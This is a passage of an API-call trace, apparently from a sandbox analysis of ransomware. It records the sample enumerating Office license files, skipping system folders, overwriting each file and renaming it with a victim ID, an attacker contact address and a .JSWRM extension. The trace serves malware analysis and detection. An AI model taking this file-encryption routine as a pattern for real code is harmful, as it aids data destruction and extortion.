lpMultiByteStr="SkypeforBusinessR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0109.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0109.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0109.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0109.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0109.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.941] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11644) returned 1 [0109.941] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0109.941] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0109.943] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.943] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0109.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.943] CloseHandle (hObject=0x45c) returned 1 [0109.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0109.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0109.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0109.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0109.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0109.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0109.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0109.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0109.944] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0109.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0109.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0109.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.945] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb59528e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb59528e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb6c6590, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29af, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeforBusinessR_Retail-pl.xrm-ms", cAlternateFileName="SKDC1F~1.XRM")) returned 1 [0109.945] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0109.945] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0109.945] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0109.945] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0109.945] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-pl.xrm-ms", lpString2="recovery") returned 1 [0109.945] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-pl.xrm-ms", lpString2="perflogs") returned 1 [0109.945] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0109.945] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.945] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-pl.xrm-ms", lpString2="system volume information") returned -1 [0109.945] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-pl.xrm-ms", lpString2="msocache") returned 1 [0109.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0109.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Retail-pl.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0109.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Retail-pl.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0109.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0109.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0109.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Retail-pl.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0109.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Retail-pl.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0109.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0109.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0109.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0109.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0109.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.946] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10671) returned 1 [0109.946] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x29a0) returned 0x24c1d0 [0109.946] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x29a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x29a0, lpOverlapped=0x0) returned 1 [0109.948] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.949] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x29a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x29a0, lpOverlapped=0x0) returned 1 [0109.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.949] CloseHandle (hObject=0x45c) returned 1 [0109.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0109.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0109.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0109.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0109.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0109.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0109.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0109.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0109.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0109.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0109.949] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0109.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0109.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0109.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.950] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaeba625, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeaeba625, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeaf9f44b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5141, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeforBusinessR_Retail-ppd.xrm-ms", cAlternateFileName="SKYPEF~1.XRM")) returned 1 [0109.950] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0109.951] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0109.951] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0109.951] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0109.951] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ppd.xrm-ms", lpString2="recovery") returned 1 [0109.951] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ppd.xrm-ms", lpString2="perflogs") returned 1 [0109.951] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0109.951] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.951] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ppd.xrm-ms", lpString2="system volume information") returned -1 [0109.951] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ppd.xrm-ms", lpString2="msocache") returned 1 [0109.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0109.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Retail-ppd.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0109.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Retail-ppd.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0109.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0109.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0109.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Retail-ppd.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0109.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0109.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Retail-ppd.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22ce70, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0109.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0109.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0109.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0109.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0109.951] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.952] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20801) returned 1 [0109.952] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5140) returned 0x24c1d0 [0109.952] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5140, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5140, lpOverlapped=0x0) returned 1 [0109.955] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.955] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5140, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5140, lpOverlapped=0x0) returned 1 [0109.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.955] CloseHandle (hObject=0x45c) returned 1 [0109.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0109.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0109.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0109.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0109.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0109.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0109.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0109.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0109.955] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0109.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0109.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0109.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0109.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.956] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb48a216, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb48a216, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb59528e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d6d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeforBusinessR_Retail-ul-oob.xrm-ms", cAlternateFileName="SKAFE4~1.XRM")) returned 1 [0109.956] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0109.956] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0109.956] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0109.957] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0109.957] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0109.957] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0109.957] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0109.957] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.957] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0109.957] lstrcmpiW (lpString1="SkypeforBusinessR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0109.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0109.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Retail-ul-oob.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0109.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 